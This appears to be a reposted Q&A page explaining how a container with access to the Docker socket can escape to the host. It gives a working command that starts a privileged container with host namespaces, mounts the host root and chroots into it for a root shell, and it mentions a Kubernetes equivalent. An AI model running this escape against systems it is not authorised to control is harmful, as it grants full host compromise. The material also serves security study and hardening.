How to execute a command directly on the host system through docker.sock in a Docker container?

All we need is an easy explanation of the problem, so here it is.

I’ve been studying Docker security and examining ways of escaping from container to host.

Suppose Docker sock (docker.sock) is mounted into the container at /var/run/docker.sock, so that Docker client (docker) can send commands to Docker daemon (dockerd).

To execute commands on the host, I could run another container and mount /etc/ into it (read-write) to schedule CRON jobs; is it possible to mount /etc/ into the current container?

What other methods are there for executing commands on the host through docker.sock?

How to solve :

I know you bored from this bug, So we are here to help you! Take a deep breath and look at the explanation of your problem. We have many solutions to this problem, But we recommend you to use the first method because it is tested & true method that will 100% work for you.

Method 1

The best way that I’ve found to execute commands on the underlying host with an exposed Docker socket is Ian Miell’s most pointless docker command ever

The command looks like this :-

docker run -ti 
    --privileged 
    --net=host --pid=host --ipc=host 
    --volume /:/host 
    busybox 
    chroot /host

and will essentially drop you straight into a full root shell on the underlying host.

To break the command down

--privileged will remove the default Docker security layers like Apparmor and capability restrictions.

--net=host --pid=host --ipc=host runs the process in the host’s namespaces instead of a separate set of namespaces for the contained process.

--volume /:/host mounts the host root filesystems as /host inside the container

then

chroot /host as a command changes the root to that /host directory.

If you’re running via Kubernetes, you can use The most pointless Kubernetes command which effectively does the same thing (assuming the cluster doesn’t have a restrictive Pod Security Policy in place).

Note: Use and implement method 1 because this method fully tested our system.
Thank you 🙂

Leave a Reply